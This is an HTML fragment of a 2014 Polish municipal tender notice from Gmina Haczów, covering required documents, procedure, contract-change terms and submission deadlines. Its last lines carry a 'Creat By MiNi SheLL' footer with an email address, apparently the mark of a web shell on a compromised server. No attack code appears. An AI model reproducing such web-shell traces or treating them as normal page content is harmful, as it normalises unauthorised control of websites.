<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadkach  przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą zamawiającego. Zmiana ta  ma być dokonana w drodze aneksu pisemnego  pod rygorem nieważności. Zmiany przewidziane w umowie mogą  być inicjowane przez Zamawiającego lub przez Wykonawcę. Zmiany o których mowa  mogą dotyczyć osób odpowiedzialnych  z ramienia Wykonawcy i Zamawiającego do  koordynowania prowadzonych robót z przyczyn  niezależnych zarówno w stosunku do projektowanych w Dokumentacji projektowej    ( podnoszących jakość technologiczną), danych adresowych  wykonawcy, terminu wykonania zamówienia w przypadku wystąpienia  niesprzyjających warunków atmosferycznych, wstrzymania robót lub przerw w pracach, powstałych z przyczyn leżących po stronie Zama?wiającego, wstrzymania robót, na mocy decyzji organów uprawnionych do wstrzymania lub przerwania robót, z przyczyn niezależnych od Zamawiającego lub Wykonawcy, wstrzymania robót na mocy decyzji Zamawiającego lub innych organów, z przyczyn innych, niż związane z błędnym sposobem realizacji robót przez Wykonawcę, użyciem przez niego wadliwych materiałów, urządzeń lub elementów wyposażenia, czy też naruszeniem przez Wy?konawcę przepisów prawa, wystąpienia w trakcie wykonywania robót kolizji z sieciami lub innymi przeszkodami, które nie były możliwe do przewidzenia po przeanalizowaniu dostarczonego Wykonawcy przez Za?mawiającego projektu budowlanego, wykonawczego, zmiany stawki podatku VAT oraz uzgodnień, wystąpienia siły wyższej, przy czym za siłę wyższą uważa się wszystkie zdarzenia, jakich nie da się przewidzieć w chwili zawarcia umowy i na które żadna ze stron nie będzie miała wpływu,  w szczególności: działania wojenne, rozruchy, klęska żywiołowa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.haczow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Gminy Haczów, 36-213 Haczów  nr  573, pokój  nr  15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2014 godzina 09:00, miejsce: Urząd  Gminy Haczów, 36-213 Haczów  nr  573, pokój  nr  1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com